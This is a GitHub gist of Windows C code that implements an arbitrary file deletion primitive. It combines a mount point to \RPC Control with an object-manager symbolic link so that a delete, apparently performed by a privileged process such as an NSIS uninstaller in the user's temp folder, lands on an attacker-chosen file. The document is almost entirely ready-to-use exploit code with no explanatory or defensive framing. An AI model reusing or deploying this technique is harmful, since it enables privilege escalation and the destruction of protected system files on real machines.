Skip to content

Instantly share code, notes, and snippets.

@rbmm

rbmm/gist:db2f8bfe0b22d768242eef895a399038

Last active July 28, 2025 19:01
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save rbmm/db2f8bfe0b22d768242eef895a399038 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save rbmm/db2f8bfe0b22d768242eef895a399038 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.txt
NTSTATUS CreateMountPoint(POBJECT_ATTRIBUTES poa, PCWSTR SubstituteName, PCWSTR PrintName)
{
NTSTATUS status = STATUS_INTERNAL_ERROR;
PREPARSE_DATA_BUFFER prdb = 0;
int len = 0;
PWSTR PathBuffer = 0;
ULONG cb = 0;
while (0 < (len = _snwprintf(PathBuffer, len, L"%ws%c%ws", SubstituteName, 0, PrintName)))
{
if (PathBuffer)
{
prdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
prdb->ReparseDataLength = (USHORT)(cb - offsetof(REPARSE_DATA_BUFFER, GenericReparseBuffer));
prdb->MountPointReparseBuffer.SubstituteNameOffset = 0;
prdb->MountPointReparseBuffer.SubstituteNameLength = (USHORT)wcslen(SubstituteName) * sizeof(WCHAR);
prdb->MountPointReparseBuffer.PrintNameOffset = prdb->MountPointReparseBuffer.SubstituteNameLength + sizeof(WCHAR);
prdb->MountPointReparseBuffer.PrintNameLength = (USHORT)wcslen(PrintName) * sizeof(WCHAR);
HANDLE hFile;
IO_STATUS_BLOCK iosb;
if (0 <= (status = NtCreateFile(&hFile, FILE_ALL_ACCESS, poa, &iosb, 0, 0, FILE_DIRECTORY_FILE,
FILE_OPEN_IF, FILE_OPEN_REPARSE_POINT|FILE_DIRECTORY_FILE, 0, 0)))
{
status = NtFsControlFile(hFile, 0, 0, 0, &iosb, FSCTL_SET_REPARSE_POINT, prdb, cb, 0, 0);
NtClose(hFile);
}
break;
}
cb = FIELD_OFFSET(REPARSE_DATA_BUFFER, MountPointReparseBuffer.PathBuffer[++len]);
prdb = (PREPARSE_DATA_BUFFER)alloca(cb);
PathBuffer = prdb->MountPointReparseBuffer.PathBuffer;
}
return status;
}
NTSTATUS CreateSymLink(PHANDLE SymbolicLinkHandle, PCWSTR pcsz, PCWSTR pszFileName)
{
NTSTATUS status;
UNICODE_STRING ObjectName, TargetName;
OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, &ObjectName, OBJ_CASE_INSENSITIVE };
if (0 <= (status = RtlDosPathNameToNtPathName_U_WithStatus(pszFileName, &TargetName, 0, 0)))
{
RtlInitUnicodeString(&ObjectName, pcsz);
status = ZwCreateSymbolicLinkObject(SymbolicLinkHandle, SYMBOLIC_LINK_ALL_ACCESS, &oa, &TargetName);
RtlFreeUnicodeString(&TargetName);
}
return status;
}
NTSTATUS Delete2(PCWSTR pszSrcFile, PCWSTR pszTargetFile)
{
NTSTATUS status;
UNICODE_STRING ObjectName;
PWSTR pszFileName;
if (0 <= (status = RtlDosPathNameToNtPathName_U_WithStatus(pszSrcFile, &ObjectName, &pszFileName, 0)))
{
pszFileName[-1] = 0;
RtlInitUnicodeString(&ObjectName, ObjectName.Buffer);
OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, &ObjectName };
if (0 <= (status = CreateMountPoint(&oa, L"\\RPC Control", L"")))
{
status = STATUS_INTERNAL_ERROR;
int len = 0;
PWSTR psz = 0;
while (0 < (len = _snwprintf(psz, len, L"\\RPC Control\\%ws", pszFileName)))
{
if (psz)
{
HANDLE hSymLink;
if (0 <= (status = CreateSymLink(&hSymLink, psz, pszTargetFile)))
{
//////////////////////////////////////////////////////////////////////////
//++ in another process
if (!DeleteFileW(pszSrcFile))
{
status = RtlGetLastNtStatus();
}
//-- in another process
//////////////////////////////////////////////////////////////////////////
NtClose(hSymLink);
}
break;
}
psz = (PWSTR)alloca(++len * sizeof(WCHAR));
}
HANDLE hFile;
IO_STATUS_BLOCK iosb;
if (0 <= NtOpenFile(&hFile, DELETE, &oa, &iosb, 0, FILE_DELETE_ON_CLOSE|FILE_DIRECTORY_FILE|FILE_OPEN_REPARSE_POINT))
{
NtClose(hFile);
}
}
RtlFreeUnicodeString(&ObjectName);
}
return status;
}
NTSTATUS Delete2Ex(PCWSTR pszSrcFile, PCWSTR pszTargetFile)
{
PWSTR psz = 0;
ULONG cch = 0;
while (cch = ExpandEnvironmentStringsW(pszSrcFile, psz, cch))
{
if (psz)
{
return Delete2(psz, pszTargetFile);
}
psz = (PWSTR)alloca(cch * sizeof(WCHAR));
}
return GetLastError();
}
Delete2Ex(L"%tmp%\\nsu.tmp\\un_b.exe", L"bbb.txt");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment